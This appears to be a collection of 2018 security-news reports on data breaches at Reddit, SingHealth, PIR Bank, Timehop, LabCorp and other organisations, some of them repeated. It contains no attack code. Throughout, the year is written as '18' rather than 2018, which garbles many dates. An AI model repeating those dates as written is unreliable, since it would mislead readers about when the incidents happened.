Unfortunately, there is another disconcerting news for the Yale community, a letter sent by the University to the State of New Hampshire Attorney General, revealed that the same server was hacked a second time between March 2016 and June 18.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At the time there is no indication that the exposed data has been misused.


Reddit discloses a data breach, a hacker accessed user data
2.8.18 securityweek Incindent

Reddit Warns Users of Data Breach
Reddit is warning its users of a security breach, an attacker broke into the systems of the platform and accessed user data.
Reddit is warning its users of a security breach, a hacker broke into the systems of the platform and accessed user data.

The hacker accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.

The data breach was discovered on June 19, 18, according to Reddit, between June 14 and 18, 18, the attacker compromised some of the employees’ accounts with the company cloud and source code hosting providers.

“A hacker broke into a few of Reddit’s systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords. Since then we’ve been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again.” reads a data breach notification published by the company.

Reddit users that are still using the same password since 2007 have to do it now and change the password for any service where they share the same login credentials.

The hacker did not gain write access to Reddit systems containing backup data, source code, and other logs.

The company explained that the accounts were protected with two-factor SMS-based authentication, a circumstance that suggests the attackers were in the position to intercept authentication codes sent via SMS.

“Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.” continues Reddit.

reddit data breach

The company has taken steps to lock down and rotate all production secrets and API keys, and to enhance our monitoring systems.

Reddit already reported the security breach to law enforcement and is notifying affected urging to change their passwords.

Let me close with this Q&A published by Reddit:

What information was involved?

Since June 19, we’ve been working with cloud and source code hosting providers to get the best possible understanding of what data the attacker accessed. We want you to know about two key areas of user data that was accessed:

All Reddit data from 2007 and before including account credentials and email addresses
What was accessed: A complete copy of an old database backup containing very early Reddit user data — from the site’s launch in 2005 through May 2007. In Reddit’s first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then.
How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you’re clear here. Check your PMs and/or email inbox: we will be notifying you soon if you’ve been affected.
Email digests sent by Reddit in June 18
What was accessed: Logs containing the email digests we sent between June 3 and June 17, 18. The logs contain the digest emails themselves — they look like this. The digests connect a username to the associated email address and contain suggested posts from select popular and safe-for-work subreddits you subscribe to.
How to tell if your information was included: If you don’t have an email address associated with your account or your “email digests” user preference was unchecked during that period, you’re not affected. Otherwise, search your email inbox for emails from [noreply@redditmail.com](mailto:noreply@redditmail.com) between June 3-17, 18.


Medical System Notifies 1.4M Patients About Computer Breach
1.8.18 securityweek   Incindent

A major Iowa hospital and medical clinic system has notified about 1.4 million patients and former patients about a computer breach that might have exposed their personal information.

UnityPoint Health officials say hackers used broke into the company's email system and could have obtained medical information.

UnityPoint's privacy officer, RaeAnn Isaacson, said Monday the company isn't aware of any misuse of patient information related to the incident. But she says the company is telling patients what UnityPoint is doing to address the situation and what patients can do to help protect their information.

The company says the hackers also might have obtained some patients' financial information.

UnityPoint say that after the problem was discovered May 31, it hired outside experts and notified the FBI.


Dixons Carphone Data Breach discovered in June affected 10 Million customers
1.8.18 securityaffairs  Incindent

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, much more than the initial estimate.
Dixons Carphone, one of the largest European consumer electronics and telecommunication retailers, suffered a major data breach in 2017, but new data related to the incident have been shared.

The situation was worse than initially thought, the company announced on Monday that the security breach affected around 10 million customers, much more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company, it promptly launched an investigation and hired an external firm to shed the light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers including their names, addresses and email addresses last year.
In June it was estimated that hackers accessed data of 1.2 million people and 5.9 million payments cards used at Currys PC World and Dixons Travel were exposed.

Dixons Carphone assured its customers that no financial data was exposed (pin codes, card verification values and authentication data).

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”

Dixons Carphone hack

The company announced further security measure to protect its system and confirmed that all necessary action to lock put the attackers have been taken.
“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time that the company suffers a security breach, in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are anyway potentially exposed to phishing attacks and have to be vigilant


KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens
30.7.18 securityaffairs Incindent

ICO platforms are becoming a privileged target for hackers, the last victim in order of time is KickICO, a Blockchain crowdfunding website for ICO.
On Friday, KickICO disclosed a security breach, according to the platform attackers accessed to its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26, at 09:04 UTC, KickICO CEO Anti Danilevski explained that its staff learned of the security breach from victims who complained to it.

KICKICO hack

“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

As of Friday, the company announced the situation was under control and the smart contract has been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners, for this reason, it invited them to connect via email report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation on the security breach, the internal staff discovered that the attackers managed to gain access to the private key of the KickICO platform used by the developers to manage the KICK token smart contract.

Once obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and created the same amount of tokens at other 40 wallets he was controlling. Using this trick the overall number of tokens hasn’t changed and security measures in place were not able to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.

Fortunately, the community quickly discovered the security breach and helped the platform to mitigate it. KICKICO quickly responded and prevented further losses by replacing the compromised private key with another one associated with the cold storage.

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.


Massive Singapore Healthcare Breach Possibly Involved Contractor
30.7.18 securityweek Incindent

Researchers have come across two Pastebin posts that could shed more light on the data breach that resulted in the health records of 1.5 million Singaporeans getting stolen by hackers.

Authorities in Singapore announced on July 20 that a sophisticated threat actor had gained unauthorized access to a database of SingHealth, the city-state’s largest group of healthcare institutions.

The incident, described as Singapore’s biggest ever data breach, resulted in personal information and details on medication becoming compromised, but authorities said medical records, clinical notes and financial information were not affected.

The attackers are said to have used a malware-infected computer to access a SingHealth database between June 27 and July 4.

Singapore officials suggested – and independent cybersecurity experts confirmed – that the attack was likely carried out by a state-sponsored threat group, but they have refrained from publicly speculating on who might be behind the operation.

Trustwave has been monitoring the incident and the security firm is also convinced that the attack was launched by a nation-state actor.

“At this point, Trustwave SpiderLabs is not assigning attribution to a specific threat actor. We have strong suspicion but do not feel we have enough information to confirm attribution,” the company said.

Over the weekend, Trustwave published a blog post detailing its analysis of two files published by unknown individuals on code and text storage website Pastebin. While they have not been able to confirm it, researchers believe these files are somehow linked to the SingHealth breach and noted that they could provide important clues about how the attackers gained access to the data.

One of the files, an exception log from a Java server, posted to Pastebin on May 24, shows a query for delegating access to a SingHealth Headquarters (SHHQ) database from a senior manager in the Medical Technology Office of Singapore’s Health Services to an employee of CTC, a major IT contractor.

The delegation request was set for June 9 - 17 and it could mean that the attacker had hijacked the contractor’s user account and leveraged it to manipulate the SingHealth database. These dates show that the hackers may have conducted at least some reconnaissance activities weeks earlier than what Singapore officials reported.

The log file also shows that the target was a database named portaldev. “It is conceivable that the development environment server was not as well protected as the production server and therefore was an easier target,” Trustwave researchers said.

The security firm also discovered a series of SQL queries, targeting SingHealth medical data, uploaded to Pastebin on June 15. These queries suggest that whoever executed them was looking for sensitive information.

While it’s possible that the files were uploaded to Pastebin by developers working on the SingHealth database, they may have also been posted by the attacker, possibly to share code with collaborators for troubleshooting purposes, Trustwave explained.

“While we cannot know for certain if these findings are directly related to the SingHealth compromise, the combination of suspicious items occurring directly within the attack window are highly suspicious,” researchers said.


Data Leak at Robotics Firm Exposes Global Manufacturers
24.7.18 securityweek Incindent

A publicly accessible server belonging to robotics vendor Level One Robotics and Controls, Inc. contained sensitive documents connected to more than one hundred manufacturing companies.

Established in 2000, the engineering service provider offers automation process and assembly for OEM’s, Tier 1 automotive suppliers, and end users, delivering services such as project management, design, integration, debug, and training.

The exposed server was discovered by UpGuard Cyber Risk team earlier this month. It contained 157 gigabytes of data, including documents, schematics, and other information belonging to the provider’s customers and employees.

The exposed data included “over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements,” the security firm reveals.

Specifications and use of the machines, as well as animations of the robots at work, customer contact details, and ID badge request forms were also found on the server.

Level One customers impacted by the data exposure include divisions of VW, Chrysler, Ford, Toyota, GM, Tesla and ThyssenKrupp.

The server also contained data belonging to organization’s employees, such as scans of driver’s licenses and passports and other identification. Level One business data was also exposed, including invoices, prices, contracts, typical business documents, and bank account details (including account and routing numbers, and SWIFT codes).

“The sheer amount of sensitive data and the number of affected businesses illustrate how third and fourth-party supply chain cyber risk can affect even the largest companies,” the security firm notes.

UpGuard says the data was exposed via rsync, the file transfer protocol commonly used for large data transfers. The researchers discovered that access to the server wasn’t restricted by IP or user and that the data was downloadable to any rsync client that connected to the rsync port.

“This is the same type of administrative error we continue to see over and over again both on-premise as well as in the cloud. Until organizations wholly operationalize security into their development lifecycle, we will likely continue to see similar data exposure from non-malicious insiders,” Matt Chiodi, VP of Cloud Security at RedLock, told SecurityWeek in an emailed commentary.

Discovered on July 1, 18, the exposed rsync server was established to belong to Level One several days later. The company was successfully informed on the issue on July 9 and closed the exposure by the next day.

“The fact that this kind of breached happened and data from so many big players was involved goes to show that anyone can be a victim if third parties are not continuously vetted. It is no longer enough for companies to maintain trust through a one-time or annual audit. Big players should demand a transparent and ongoing demonstration of security controls in action,” James Lerud, head of the Behavioral Research Team at Verodin, said in an emailed commentary.


"MoneyTaker" Hackers Stole $1 Million From Russian Bank
22.7.18 securityweek Incindent

A cybercriminal group referred to as MoneyTaker recently managed to steal nearly $1 million from PIR Bank (Russia), according to cybercrime research firm Group-IB.

The theft was performed on July 3 through the Russian Central Bank’s Automated Workstation Client, an interbank system similar to SWIFT. The hackers managed to transfer the funds to 17 accounts at major Russian banks and then cashed them out.

After the incident, the cybercriminals also attempted to maintain persistence in the bank’s network, but were detected. While PIR staff was able to delay the withdrawal of some of the funds, it appears that most of what was stolen has been lost, namely around $920,000 (which is a conservative estimate, according to Group-IB).

Group-IB, which analyzed the incident, says that all evidence points to the MoneyTaker group orchestrating the theft. The investigators discovered tools and techniques previously associated with the group, along with the IP addresses of their command and control (C&C) servers.

The security firm previously reported that MoneyTaker had launched over 20 successful attacks against financial institutions and legal firms in the US, UK and Russia over the past two years. The group has been mainly focused on card processing systems, such as the AWS CBR (Russian Interbank System) and SWIFT (US).

The security researchers established that the attack on PIR Bank started in late May 18 and that a compromised router of one of the bank’s regional branches was used as entry point.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks,” the researchers say.

The hackers breached the bank’s main network and accessed the AWS CBR, then generated payment orders and sent money to mule accounts prepared in advance. Funds were transferred to accounts at 17 of the largest banks and were immediately cashed out by money mules via ATMs.

The bank employees discovered the unauthorized transactions with large sums on the evening of July 4 and asked the regulator to block the AWS CBR digital signature keys, but weren’t able to stop the financial transfers in time. Thus, the hackers managed to cash out most of the stolen money.

The attackers also cleared OS logs on compromised computers, to hinder analysis. They also left reverse shells onto the bank’s computers to conduct new attacks, but these were discovered during investigation and removed.

Attacks on AWS CBR are not easy to implement, Valeriy Baulin, Head of Digital Forensics Lab Group-IB, says. Thus, such attacks are “not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully.”

“This is not the first successful attack on a Russian bank with money withdrawal since early 18. We know of at least three similar incidents. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind,” Baulin said.


HR Services Firm ComplyRight Suffers Data Breach
22.7.18 securityweek Incindent

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.ComplyRight hacked

However, ComplyRight says the data breach has only impacted less than 10 percent of the individuals whose tax forms have been prepared on its platform.

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 18 and May 22, 18.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Singapore Says Hackers Stole 1.5 Million Health Records in Massive Cyberattack
22.7.18 securityweek Incindent

Hackers have stolen the health records of 1.5 million Singaporeans including Prime Minister Lee Hsien Loong, authorities said Friday, with the leader specifically targeted in the city-state's biggest ever data breach.

Singapore's health and information ministries said a government database was broken into in a "deliberate, targeted and well-planned" strike, describing the attack as "unprecedented".

"Attackers specifically and repeatedly targeted the personal particulars and outpatient information of Prime Minister Lee Hsien Loong," health minister Gan Kim Yong told a press conference.

Forensic analysis by Singapore's Cyber Security Agency "indicates this is a deliberate, targeted, and well-planned cyber-attack and not the work of casual hackers or criminal gangs," he added.

Officials declined to comment on the identity of the hackers, citing "operational security", but said the prime minister's data has not shown up anywhere on the internet.

"I don't know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret, or at least something to embarrass me," Lee wrote on Facebook.

"My medication data is not something I would ordinarily tell people about, but there is nothing alarming in it."

Hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The compromised data includes personal information and medication dispensed to patients, but medical records and clinical notes have not been affected, the health and communications ministries said.

"Health records contain information that is valuable to governments," said Eric Hoh, Asia-Pacific president of cyber-security firm FireEye.

"Nation-states increasingly collect intelligence through cyber-espionage operations which exploit the very technology we rely upon in our daily lives."

Earlier this month, the US National Intelligence Director Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the cyber-attack. A former judge will head a committee looking into the incident.

While the city-state has some of the most advanced military weaponry in the region, the government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their basements to nation-states.

In his Facebook post about the attack, Loong warned that "those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying."

In 2017, hackers broke into a defence ministry database, stealing the information of some 850 Singapore army conscripts and ministry staff.


MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank
22.7.18 securityaffairs  Incindent

The cybersecurity firm Group-IB is involved in the incident response on an attack on the Russian PIR Bank conducted by MoneyTaker hacking group.
MoneyTaker hacker group has stolen 1 million US dollars from the Russian bank, the cyber heist occurred on July 3 through the Russian Central Bank’s Automated Workstation Client (an interbank fund transfer system similar to SWIFT).

Crooks transferred the money to 17 accounts at major Russian banks and cashed out, then tried to ensure persistence in the bank’s network for later attacks. The bank hired Group-IB in order to respond to the incident and limit the damages.

According to Kommersant newspaper, the MoneyTaker hacking group stole around $920,000 (which is a conservative estimate) from the Russian bank. The PIR Bank officially confirmed the attack, but it was unable to determine the exact amount of money stole by the attackers.

Even if the bank managed to delay the withdrawal of the stolen funds, most of them are lost.

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible. At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents,” said Olga Kolosova, Chairperson of the Management Board of PIR Bank LLC.

Forensics analysis of workstations and servers at the bank revealed that the attack was launched by the MoneyTaker hacker group. The hackers used specific tools and techniques that had been used earlier by MoneyTaker in previous attacks on financial institutions. The experts also noticed that the IP addresses of their C&C servers were the same used in previous attacks.

MoneyTaker is a cybercrime gang specialized in targeted attacks on financial institutions, in December 2017 Group-IB published a detailed report on its activity (MoneyTaker: 1.5 Years of Silent Operations). The group is focused on card processing and interbank transfer systems (AWS CBR and SWIFT).

MoneyTaker hacker group

The MoneyTaker group has been active at least since spring 2016 when they stole money from a U.S. bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers went in the dark for almost 4 months and only attacked banks in Russia in September 2016.

Group-IB recorded 10 MoneyTaker attacks against organizations in the U.S., UK, and Russia. Since 2017, the group restricted the geography of the attacks to Russia and the U.S.

In 18, Group-IB tracked two MoneyTaker attacks in Russia.

“MoneyTaker has its own set of specific TTPs. The hackers try to go unnoticed, use ‘one-time’ infrastructure, ‘fileless’ software and carefully cover up traces of their presence. This involves specific usages of Metasploit and PowerShell Empire frameworks.” states Group-IB.

Back to the PIR Bank attack, Group-IB confirmed that the attack on PIR Bank started in late May 18. Hackers gained access to the bank by compromising router used by one of the bank’s regional branches.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.” reads the press release published by Group-IB.

MoneyTaker group use PowerShell scripts to establish persistence in the banks’ systems and automate some stages of their attack. Once the crooks have hacked the bank’s main network, they managed to gain access to AWS CBR (Automated Work Station Client of the Russian Central Bank) to generate payment orders and send money in several tranches to mule accounts prepared in advance.

On the evening of July 4, bank IT staff discovered the unauthorized transactions with large sums, it quickly asked the regulator to block the AWS CBR digital signature keys, but it was not possible to stop the financial transfers in time.

Most of the stolen money was transferred to cards of the 17 largest banks on the same day and immediately cashed out by money mules involved in the final stage of money withdrawal from ATMs.

MoneyTaker hackers cleared OS logs on many computers, which was meant to hinder the response to the incident and its subsequent investigation, a technique already observed in other attacks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response this was detected by Group-IB employees and removed by the bank’s sysadmins.” added Group-IB.

“This is not the first successful attack on a Russian bank with money withdrawal since early 18,” says Valeriy Baulin, Head of Digital Forensics Lab Group-IB, “We know of at least three similar incidents, but we cannot disclose any details before our investigations are completed. As for withdrawal schemes, each group specializing in targeted attacks – Cobalt, Silence and MoneyTaker (these have been the most active groups in 18) – have their own scheme depending on the amounts and cashout scenarios. We should understand that attacks on AWS CBR are difficult to implement and are not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind.”


SingHealth, largest healthcare group in Singapore, suffered a massive data breach
22.7.18 securityaffairs  Incindent

SingHealth, the largest healthcare group in Singapore, suffered a massive data breach that exposed 1.5 Million patient records.
The largest healthcare group in Singapore, SingHealth, has suffered a massive data breach that exposed personal information of 1.5 million patients who visited the clinics of the company between May 2015 and July 18. Stolen records include patient’s name, address, gender, race, date of birth, and National Registration Identity Card (NRIC) numbers.

SingHealth has 42 clinical specialties, a network of 2 Hospitals, 5 National Specialty Centres, 9 Polyclinics, and Bright Vision Community Hospital.

According to a data breach notification released by Singapore’s Ministry of Health (MOH), hackers stole personal information along with ‘information on the outpatient dispensed medicines’ of about 160,000 patients. Data belonging to Singapore’s Prime Minister Lee Hsien Loong and of other ministers have been exposed in the security breach.

“About 1.5 million patients who visited SingHealth’s specialist outpatient clinics and polyclinics from 1 May 2015 to 4 July 18 have had their non-medical personal particulars illegally accessed and copied. The data taken include name, NRIC number, address, gender, race and date of birth. Information on the outpatient dispensed medicines of about 160,000 of these patients was also exfiltrated. The records were not tampered with, i.e. no records were amended or deleted.” reads the data breach notification.

“On 4 July 18, IHiS’ database administrators detected unusual activity on one of SingHealth’s IT databases. They acted immediately to halt the activity,”

SingHealth Singapore hack

According to Singapore’s authorities, the hackers specifically and repeatedly targeted Prime Minister Lee Hsien Loong’s data.

MOH explained that the data breach is the result of a targeted attack, local media speculate the involvement of a nation-state actor in the cyber attack.

“Investigations by the Cyber Security Agency of Singapore (CSA) and the Integrated Health Information System (IHiS)[1] confirmed that this was a deliberate, targeted and well-planned cyberattack. It was not the work of casual hackers or criminal gangs.” reads the press release.

Commenting on the cyber attack through a Facebook post published today,

Singapore’s Prime Minister declared the attackers are “extremely skilled and determined” and they have “huge resources” to conduct such cyber attacks repeatedly, a attacker’s profile that match with an APT group.

“I don’t know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret or at least something to embarrass me. If so, they would have been disappointed,” Singapore PM said. “My medication data is not something I would ordinarily tell people about, but nothing is alarming in it.” wrote Singapore’s Prime Minister.

“Those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying. Government systems come under attack thousands of times a day. Our goal has to be to prevent every single one of these attacks from succeeding. If we discover a breach, we must promptly put it right, improve our systems, and inform the people affected.”

The good news for Singapore citizens is that no medical records were accessed by hackers.

All affected patients will be contacted by the healthcare institution over the next five days.


Thousands of Mega account credentials leaked online, it is credential stuffing
20.7.18 securityaffairs Incindent

Thousands of account credentials associated with the popular file storage service Mega have been published online,
The former NSA hacker Patrick Wardle, co-founder at Digita Security, discovered in June a text file containing over 15,500 usernames, passwords, and files names.

patrick wardle

@patrickwardle
😢 Found file on VirusTotal w/ 15K+ Mega accounts (user names/passwords & users' file listings)

😥🤬 File listings included files names describing child abuse content

👮🏽‍♂️🚔🌍 International law enforcement actively engaged

🙏🏽 @zackwhittaker for writeup & collaboration! https://twitter.com/zackwhittaker/status/1018997928793464833 …

11:01 AM - Jul 18, 18
69
32 people are talking about this
Twitter Ads info and privacy
The presence of the files suggests that the threat actors that collected them also accessed to each account and listed its content.

Wardle discovered the file after it was uploaded to the VirusTotal service some months earlier by a user purportedly in Vietnam.

Wardle passed the data to ZDNet that verified the huge trove of data belongs to the Mega service.

ZDNet contacted many users that confirmed the authenticity of the content of the file.

The data appears to date back to 2013, when Kim Dotcom launched the service.

Mega

ZDNet asked the popular expert Troy Hunt, who runs the data breach notification site Have I Been Pwned, to analyze the files.

Hunt believes the hackers collected the credentials from other data breaches (credential stuffing).

98 percent of the addresses in the file had already been included in a previous data breach and listed in the Hunt’ service.

“Some 87 percent of the accounts in the Mega file were found in a massive collection of 2,844 data breaches that he uploaded to the service in February, said Hunt.” read the post published by ZDNet.

“Of those we contacted, five said that they had used the same password on different sites.”

Mega chairman Stephen Hall also confirmed the file is the result of credential stuffing.

Experts noticed the Mega service doesn’t implement two-factor authentication -making it easy for attackers to access an account once it will obtain the credentials from other breaches.

Mega logs the IP address of each user who accesses to an account and some users confirmed to have noticed suspicious logins accessing their account from countries in Eastern Europe, Russia, and South America since the file was uploaded.

“One of the accounts in the file contained file listings for what appeared to describe child abuse content. Given the nature of the account’s content, ZDNet informed the authorities.” continues ZDNet.

The illegal content was uploaded years earlier, suggesting that the account owner has store excluding any recent third-party involvement.

“Mega has zero tolerance for child sexual abuse materials,” said Hall. “Any reports result in links being deactivated immediately, the user’s account closed and the details provided to the authorities.”

“Mega can’t act as censor by examining content as it is encrypted at the user’s device before being transferred to Mega,” he said. “As well as it being technically impossible, it is also practically infeasible for Mega and other major cloud storage providers, with 100s of files being uploaded each second.”


HR Services Firm ComplyRight Suffers Data Breach
20.7.18 securityweek Incindent

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.ComplyRight hacked

However, ComplyRight says the data breach has only impacted less than 10 percent of the individuals whose tax forms have been prepared on its platform.

ComplyRight hacked

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 18 and May 22, 18.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Timehop provides additional details on the recent security breach

19.7.18 securityaffairs Incindent

Timehop has recently announced to have suffered a data breach that affected 21 million user accounts. The company now shares additional details about the incident.
Timehop service aims to help people in finding new ways to connect with each other by analyzing past activities, earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. The tokens have been quickly revoked and currently don’t work.

Wednesday the company provided an update on the incident adding that further info was exposed, including dates of birth, genders, and country codes.

timehop

“Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

TYPE OF PERSONAL DATA COMBINATION # OF BREACHED RECORDS # OF BREACHED GDPR RECORDS
Name, email, phone, DOB 3.3 million 174,000
Name, email address, phone 3.4 million 181,000
Name, email address, DOB 13.6 million 2.2 million
Name, phone number, DOB 3.6 million 189,000
Name and email address 18.6 million 2.9 million
Name and phone number 3.7 million 198,000
Name and DOB 14.8 million 2.5 million
Name total 20.4 million 3.8 million
DOB total 15.5 million 2.6 million
Email addresses total 18.6 million 2.9 million
Gender designation total 9.2 million 2.6 million
Phone numbers total 4.9 million 243,000
The company provided a detailed analysis of exposed info, specifically for the affected PII records in compliance with the introduced GDPR.

According to the company, hackers first breached into its systems on December 19, 2017, using an employee’s credentials for the company’s cloud computing environment.

The attackers accessed the systems through an IP address in the Netherlands.

In a first phase, the hacker conducted a reconnaissance, at the time the compromised environment had not stored any personal information. In early April, the company moved personal information to the compromised database and the attackers found it only on June 22.

On July 4, the hacker exfiltrated the data and changed its password. The activity was noticed by the company in nearly 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”


US Biggest Blood Testing Laboratories LabCorp suffered a security breach
19.7.18 securityaffairs Incindent

Hackers have breached the network at LabCorp, one of the largest diagnostic blood testing laboratories in the US, millions of Americans potentially at risk.
The biggest blood testing laboratories network in the US, LabCorp has suffered a security breach. The company announced the incident on Monday, the security breach occurred over the weekend.

The hackers breached into the LabCorp Diagnostic systems, but the company says there’s no indication that attackers compromised also the systems used by its drug development business Covance.

“At this time, there is no evidence of unauthorized transfer or misuse of data. LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation,” it said, in its statement.

LabCorp did not share further details about the security breach, in response to the incident the company shut down part of its infrastructure.

“LabCorp immediately took certain systems offline as part of its comprehensive response to contain the activity,” the firm said in a 8-K filed with the Securities and Exchange Comission.

“This temporarily affected test processing and customer access to test results over the weekend. Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed today, and we anticipate that additional systems and functions will be restored through the next several days,”

Biggest Blood Testing Laboratories LabCorp
